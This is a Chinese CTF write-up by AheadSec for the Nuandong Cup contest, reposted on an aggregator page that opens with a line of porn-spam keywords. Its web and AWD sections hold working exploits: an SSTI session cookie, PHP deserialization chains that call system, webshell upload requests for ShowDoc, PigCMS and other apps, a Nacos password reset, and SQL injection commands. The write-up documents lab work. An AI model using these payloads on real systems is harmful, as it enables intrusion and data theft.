国产无码综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

掌控安全暖冬杯 CTF Writeup By AheadSec

2年前作者：末初分類：Toy博客閱讀(22)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了掌控安全暖冬杯 CTF Writeup By AheadSec。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方，請大家不吝賜教，您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF

本來結(jié)束時(shí)發(fā)到了學(xué)校AheadSec的群里面了的，覺得這比賽沒啥好外發(fā)WP的，但是有些師傅來問了，所以還是發(fā)一下吧。

Web

簽到：又一個(gè)計(jì)算題

暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF

計(jì)算器

掃目錄能看到/admin路徑
在doCalc的源碼報(bào)錯(cuò)下面能看到獲取了一個(gè)username參數(shù)
以及 secret_key
暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF
利用 https://github.com/noraj/flask-session-cookie-manager.git 生成payload

python3 flask_session.py encode -s 7Wt4VH26Pb -t '{"username":"{%print(((lipsum.__globals__.__builtins__.__import__(\"os\").popen(\"cat /root/runtime/flag.py\")).read()))%}"}'

得到

.eJwlykEKAyEMQNGrlMCAbnTfswwEp02HgJoQ46IMc_cK3f0H_4I5yHppBE-4NjXuHkKorGO2hHhWOUodiKuPydW5_8FNxRwx7CBjh5hUlPrSq_gjm4hnm925Uf7Ucib9rikmo_IOMcbthvsH50grQw.ZWWEtw.doCCqKuEePHIGvmlq0LVAUt3aDU

最后可直接獲取flag

GET /admin HTTP/1.1
Host: kso7fdtw.lab.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.61
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
DNT: 1
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: session=.eJwlykEKAyEMQNGrlMCAbnTfswwEp02HgJoQ46IMc_cK3f0H_4I5yHppBE-4NjXuHkKorGO2hHhWOUodiKuPydW5_8FNxRwx7CBjh5hUlPrSq_gjm4hnm925Uf7Ucib9rikmo_IOMcbthvsH50grQw.ZWWEtw.doCCqKuEePHIGvmlq0LVAUt3aDU

暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF

PHP反序列化

<?php
  error_reporting(0);
highlight_file(__FILE__);
class evil{
  public $cmd;
  public $a;
  public function __destruct(){
    if('VanZZZZY' === preg_replace('/;+/','VanZZZZY',preg_replace('/[A-Za-z_\(\)]+/','',$this->cmd))){
      eval($this->cmd.'givemegirlfriend!');
    } else {
      echo 'nonono';
    }
  }
}

if(!preg_match('/^[Oa]:[\d]+|Array|Iterator|Object|List/i',$_GET['Pochy'])){
  unserialize($_GET['Pochy']);
} else {
  echo 'nonono';
}

exp:

<?php class evil
{
  public $cmd="eval(next(getallheaders()));__halt_compiler();";
  }
  $a=new SplStack();
$a->push(new evil());
$b=serialize($a);
echo($b);

http://ywft1o9f.lab.aqlab.cn/?Pochy=C:8:%22SplStack%22:84:{i:6;:O:4:%22evil%22:1:{s:3:%22cmd%22;s:46:%22eval(next(getallheaders()));__halt_compiler();%22;}}

User-Agent: system('cat flag.php');

又一個(gè)PHP反序列化

鏈子

R::welcome() <- E::__invoke <- K::__call <- C::__get() <- A::__toString() <- H::welcome()

構(gòu)造POP

<?php 
class A
{
    public $hacker;
    public  function __toString()
    {
        echo $this->hacker->name;
        return "";
    }
}
class C
{
    public $finish;
    public function __get($value)
    {
        $this->finish->hacker();
        echo 'nonono';
    }
}
class E
{
    public $hacker;

    public  function __invoke($parms1)
    {   
        echo $parms1;
        $this->hacker->welcome();
    }
}

class H
{
    public $username="admin";
    public function __destruct()
    {
        $this->welcome();

    }
    public  function welcome()
    {
        echo "welcome~ ".$this->username;
    }
}

class K
{
    public $func;
    public function __call($method,$args)
    {
        call_user_func($this->func,'welcome');
    }
}

class R
{
    public $method;
    public $args;

    public  function welcome()
    {
        if ($this->key === true && $this->finish1->name) {
            if ($this->finish->finish) {
                call_user_func_array($this->method,$this->args);
            }
        }
    }
}


$H = new H();
$A = new A();
$C = new C();
$K = new K();
$E = new E();
$R = new R();
$R -> method = 'syssystemtem';
$R -> args = ['cat f*'];
$E -> hacker = $R;
$K -> func = $E;
$K -> func -> hacker -> key = True;
$K -> func -> hacker -> finish1 -> name = True;
$K -> func -> hacker -> finish -> finish = True;
$C -> finish = $K;
$A -> hacker = $C;
$H -> username = $A;
echo serialize($H);


// O:1:"H":1:{s:8:"username";O:1:"A":1:{s:6:"hacker";O:1:"C":1:{s:6:"finish";O:1:"K":1:{s:4:"func";O:1:"E":1:{s:6:"hacker";O:1:"R":5:{s:6:"method";s:12:"syssystemtem";s:4:"args";a:1:{i:0;s:6:"cat f*";}s:3:"key";b:1;s:7:"finish1";O:8:"stdClass":1:{s:4:"name";b:1;}s:6:"finish";O:8:"stdClass":1:{s:6:"finish";b:1;}}}}}}}
 ?>

雙寫繞過替換為空，非法傳參繞過，并且因?yàn)閷Ψ葱蛄谢址幸淮翁鎿Q，原本的長度會(huì)有變化，手工修改長度
暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF

po[p.er=
O:1:"H":1:{s:8:"username";O:1:"A":1:{s:6:"hacker";O:1:"C":1:{s:6:"finish";O:1:"K":1:{s:4:"func";O:1:"E":1:{s:6:"hacker";O:1:"R":5:{s:6:"method";s:6:"syssystemtem";s:4:"args";a:1:{i:0;s:6:"cat f*";}s:3:"key";b:1;s:7:"finish1";O:8:"stdClass":1:{s:4:"name";b:1;}s:6:"finish";O:8:"stdClass":1:{s:6:"finish";b:1;}}}}}}}

查看源碼即可獲得flag
暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF

Misc

這是鄒節(jié)倫的桌面背景圖

暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF
壓縮包提取出來，指定解壓這兩張沒有加密的圖

雙圖盲水印

PS D:\Tools\Misc\BlindWaterMark> python .\bwmforpy3.py decode .\source.png .\result.png flag1.png
image<.\source.png> + image(encoded)<.\result.png> -> watermark<flag1.png>
PS D:\Tools\Misc\BlindWaterMark>

壓縮包密碼：Ctf-Game-Start
暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF

ctf{c5364cb0-882f-11ee-b421-000c29a4e4e5}

什么鬼？這是圖片

每隔八個(gè)字節(jié)逆序
暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF
腳本簡單處理即可

hexData = ''
with open('resutl.png', 'rb') as f:
	pngData = ""
	hexData = bytes.hex(f.read())
	for i in range(0, len(hexData), 16):
		blockData = hexData[i:i+16][::-1]
		for j in range(0, len(blockData), 2):
			byteData = blockData[j:j+2][::-1]
			pngData += byteData
with open('flag.png', 'wb') as f:
	f.write(bytes.fromhex(pngData))

暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF
最終flag是CTF包裹

ctf{d77aa664-8834-11ee-a068-000c29a4e4e5}

五顏六色的圖片

讀RGB轉(zhuǎn)ZIP，腳本簡單處理

from PIL import Image

with Image.open('rgb.png') as img:
	width, height = img.size
	hexData = ""
	for h in range(height):
		for w in range(width):
			pix = img.getpixel((w, h))
			for p in pix:
				hexData += '{:02x}'.format(p)
with open('flag.zip', 'wb') as f:
	f.write(bytes.fromhex(hexData))

解壓得到flag

ctf{1c7c3eec-8841-11ee-b9bf-000c29a4e4e5}

流量分析

tcp.stream eq 49

暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF
解壓密碼

PS C:\Users\Administrator\Downloads> php -r "var_dump(base64_decode('QzovZmxhZyhjdGZfZ2FtZSkuemlw'));"
Command line code:1:
string(21) "C:/flag(ctf_game).zip"

hexData = "504b0304140001000000328875576f42da69350000002900000008000000666c61672e747874f0ffcbadf3f92591d9efa30772829a2c9dfc9e88c4eceac0ab03fa3f25e8aca42a6de2845121b58c6169f1c01b768dfc8bede44c06504b01023f00140001000000328875576f42da693500000029000000080024000000000000002000000000000000666c61672e7478740a002000000000000100180069c39454591cda0100000000000000000000000000000000504b050600000000010001005a0000005b0000000000316263646666353739633436"
with open('flag111.zip', 'wb') as f:
	f.write(bytes.fromhex(hexData))

解壓得到flag

ctf{87bb9ae4-884c-11ee-9329-000c29a4e4e5}

你會(huì)解碼嗎？

查看源碼
暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF
URL解碼得到Quoted-printable編碼

解碼得到社會(huì)主義核心價(jià)值觀編碼

然后社會(huì)主義核心價(jià)值觀解碼得到ASCII

>>> ''.join([chr(int(i)) for i in '102,108,97,103,123,74,110,76,88,121,112,71,52,53,95,48,98,105,77,48,51,125'.split(',')])
'flag{JnLXypG45_0biM03}'

Cryptography

參考： https://blog.csdn.net/qq_47875210/article/details/127576150
然后flag一直交不對
暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF
即可拿到flag

Reverse

xor

加密過程是對上一個(gè)字符進(jìn)行異或
暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF
exp

enc = [0x66, 0x0A, 0x6B, 0x0C, 0x77, 0x26, 0x4F, 0x2E, 0x40, 0x11, 
  0x78, 0x0D, 0x5A, 0x3B, 0x55, 0x11, 0x70, 0x19, 0x46, 0x1F, 
  0x76, 0x22, 0x4D, 0x23, 0x44, 0x0E, 0x67, 0x06, 0x68, 0x0F, 
  0x47, 0x32, 0x4F]

flag = ''

for i in range(len(enc)-1, 0, -1):
    enc[i] ^= enc[i-1]
    flag += chr(enc[i])

print('f'+flag[::-1])
# flag{QianQiuWanDai_YiTongJiangHu}

init

使用IDA打開發(fā)現(xiàn)異或
暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF
在compara中找到密文

exp:

enc = [0x66, 0x6D, 0x63, 0x64, 0x7F, 0x56, 0x69, 0x6A, 0x6D, 
       0x7D, 0x62, 0x62, 0x62, 0x6A, 0x51, 0x7D, 0x65, 0x7F, 0x4D, 
       0x71, 0x71, 0x73, 0x79, 0x65, 0x7D, 0x46, 0x77, 0x7A, 0x75, 0x73, 0x21, 0x62]

for i in range(len(enc)):
    print(chr(enc[i] ^ i), end='')
# flag{Something_run_before_main?}

AWD

漏洞挖掘–簽到題

修改nacos密碼

 curl  -d "username=nacos1&newPassword=123456"  -X PUT http://glkb-qkj2.aqlab.cn/nacos/v1/auth/users

登錄直接拿flag

開胃小菜

Ruoyi 后臺遠(yuǎn)程加載jar包拿shell
參考 https://github.com/lz2y/yaml-payload-for-ruoyi

老day裝新酒

POST /showdoc/index.php?s=/home/page/uploadImg HTTP/1.1
Host: u4py83-eo3.aqlab.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 268

----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain

<?php echo '123_test';@eval($_GET[cmd])?>
----------------------------921378126371623762173617--

直接拿shell
暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF

小小bypass

整體思路是任意文件讀取+注入拿地址
首先注冊個(gè)賬號
暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF

手機(jī)號為
13650955537
密碼隨便
暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF

登錄之后抓包拿下token
暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF

之后在通過SSRF拿到flag，程序后端會(huì)將他存到本地，然后將路徑存入到數(shù)據(jù)庫中
漏洞點(diǎn)位于application/api/logic/UserLogic.php
暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF
之后在通過前臺的注入拿到flag值
注入點(diǎn)

http://m8o3fug2.lab.aqlab.cn/api/goods_comment/category?goods_id=*

sqlmap直接梭哈可拿到頭像圖片路徑
訪問圖片路徑即可拿到flag

有點(diǎn)東西，傳什么？

是個(gè)Nday
直接上傳webshell

 curl "http://c88f07ac9.lab.aqlab.cn/index.php/upload/ajax_upload_chat?type=image" -F file=@1.php

前臺

PigCMS
直接穿馬路徑會(huì)回顯

POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----aaa

------aaa
Content-Disposition: form-data; name="filePath"; filename="test.php"
Content-Type: video/x-flv

<?php phpinfo();?>
------aaa

什么注？

通過堆疊將flag outfile到web路徑上可直接讀取

http://bwo330m4vx.lab.aqlab.cn/index.php?s=api/goods_detail&goods_id=1;select load_file('/flag.txt') into outfile '/var/www/localhost/htdocs/xx22211111111.txt';#

奪寶

前臺注入拿到后臺admin hash+后臺緩存getshell
參考 https://mp.weixin.qq.com/s/BAHeQYjp-eVgkkGayM11eQ

然后自己構(gòu)造一個(gè)tamper，跑SQLMap即可

sqlmap --dbms="mysql" -u "http://m8o3fug2.lab.aqlab.cn/api/goods_comment/category?goods_id=*" -D likeshop  -T ls_user --dump

還有寶塔waf 這有點(diǎn)離譜了
但是還好可以使用readfile函數(shù)直接讀取flag
靶場關(guān)了用下文章的圖
暖冬杯 ctf 全wp,Game Writeups,掌控安全暖冬杯CTF
把那個(gè)eval換成readfile('/www/wwwroot/mawd16-20.aqlab.cn/flag.php')即可拿到flag文章來源地址http://www.zghlxwxcb.cn/news/detail-771166.html

到了這里，關(guān)于掌控安全暖冬杯 CTF Writeup By AheadSec的文章就介紹完了。如果您還想了解更多內(nèi)容，請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！

本文來自互聯(lián)網(wǎng)用戶投稿，該文觀點(diǎn)僅代表作者本人，不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù)，不擁有所有權(quán)，不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載，請注明出處：如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符，請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋，一經(jīng)查實(shí)，立即刪除！

分享到：

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

[CTF]2022美團(tuán)CTF WEB WP
最終排名源碼由上源碼可知想要造成pickle反序列化需要兩步: 1.得到secret_key 2.繞過黑名單造成pickle反序列化漏洞那么先來實(shí)現(xiàn)第一步: app.config[‘SECRET_KEY’] = os.urandom(2).hex() #設(shè)置key為隨機(jī)打亂的4位數(shù)字字母組合例如a8c3 從這里知道，想要爆破key其實(shí)并不難，可以自己試試那
2024年02月06日
瀏覽(26)
【2022Paradigm.ctf】random writeup
區(qū)塊鏈智能合約相關(guān)題目，挺有意思，簡單分享。題目內(nèi)包含兩個(gè)鏈接： https://github.com/paradigmxyz/paradigm-ctf-infrastructure 對應(yīng)后端服務(wù)搭建相關(guān)，只看eth-challenge-base目錄即可。 random.zip，合約代碼內(nèi)容，也是題目關(guān)鍵，合約代碼貼在后面。 1 - launch new instance 2 - kill instance 3 - g
2024年02月06日
瀏覽(14)
Bugku CTF：請攻擊這個(gè)壓縮包[WriteUP]
?拿到手就是一個(gè)加密了的壓縮包里面有一個(gè)flag.png文件像這種沒有任何提示的情況下只有三種選擇： 1.暴力破解 2.考慮zip偽加密 3.明文攻擊暴力破解，效率低而且不跑個(gè)一年半載大概率拿不到口令把文件拖進(jìn)010editor查看，發(fā)現(xiàn)這是真加密所以這條路也斷了所以我們嘗試一
2024年01月18日
瀏覽(108)
CTF_BUGKU_WEB_game1
記錄學(xué)習(xí)CTF的過程中，在BUGKU平臺上的一道WEB題首先啟動(dòng)bugku提供的環(huán)境是一道小游戲題目，先打開F12，玩一次。果然靠真玩無法通關(guān)，可以查看控制臺Network上提交成績請求的數(shù)據(jù)流被服務(wù)器返回“失敗了”。 PS:在此會(huì)想到之前做過的一道c/s客戶端小游戲的題目，解題方法
2024年02月05日
瀏覽(25)
[青少年CTF]-MISC WP(二)
16）17insanity FLAG：INSA{Youre_crazy_I_like_it} 17）17sanity FLAG：INSA{Youre_sane_Good_for_you} 18）原sher FLAG：qsnctf{c1f5e391-83dd-47e3-9f15-0e32eaafdc95} 19）簽到 20）八卦迷宮 FlAG：cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang} 21）我看他是喜歡套娃! 摩斯電碼在線轉(zhuǎn)換培根密碼在線加解
2024年02月14日
瀏覽(34)
攻防世界ctf web easyphp題解wp
第一步，用科學(xué)計(jì)數(shù)法繞過 a=1e9 第二步，用php代碼編寫MD5碰撞腳本得到b=53724 第三步，繞過is_numeric函數(shù) 第四步，繞過is_array函數(shù) ?第五步，繞過array_search函數(shù) 一定要對傳值url編碼提交得到flag ?
2024年02月16日
瀏覽(18)
青少年CTF訓(xùn)練平臺 — CRYPTO通關(guān)WP
vxshyk{g9g9g099-hg33-4f60-90gk-ikff1f36953j} 凱撒解碼 cXNuY3RmezY4NjkwOGJjLTFiZjItNGMxOS04YTAxLWIyYzc3NjAwOTkyOH0= base64解碼 4d4e4d4534354b5a474e4a47325a4c324b56354532563256504a4d585551544d4a524c554d32535a4b524958495453484c4a574532364a524e42485549524a554a524c564b3653324b354b5855574b554d3432453436535247424845514d4235 HEX —base32—base64 qsnctf{.----
2024年02月05日
瀏覽(58)
*CTF 2023 web jwt2struts 題解wp
根據(jù)題目名字猜測，這題考察jwt和Struts2 包里面果然有一個(gè)cookie 驗(yàn)證了，是jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1c2VyIiwiZXhwIjoyMDA2MjI1MjgxfQ.F7vOtdqg48M1DYK4tVZywTipIYDqKfsBSju7ekLSecU 我們的目標(biāo)應(yīng)該是把 user 改成 admin 首先，直接修改試試，結(jié)果是不行的。再嘗試一下爆破：也是不行
2024年02月14日
瀏覽(21)
2023寒鷺Tron-CTF迎新賽 CRYPTO Misc 全WP
1、題目信息 2、解題方法兔子密碼，在線工具直接解 1、題目信息 2、解題方法 flag有三部分第一部分：BrainFuck解碼第二部分：ook! 第三部分：UUencode解碼 1、題目信息 2、解題方法像摩斯，但不是摩斯，是摩斯的變形。。。把 . 換成 0 ， / 換成 1，二進(jìn)制解碼：最后把flag換
2024年02月08日
瀏覽(19)
[青少年CTF]Web—Easy CheckMe1-8 by 周末
青少年CTF訓(xùn)練平臺 CheckMe1-8 個(gè)人博客：https://www.st1ck4r.top/ 考點(diǎn)：php代碼審計(jì) 給了一個(gè)輸入框，先隨便輸點(diǎn)東西進(jìn)去。直接就給出了源碼，分析該源碼。現(xiàn)在情況很明了了，我們需要傳入字符串\\\"qsnctf\\\"的base64加密字符串。利用在線網(wǎng)站進(jìn)行加密。傳入?yún)?shù)。 Tips: ? 使用ha
2024年02月06日
瀏覽(38)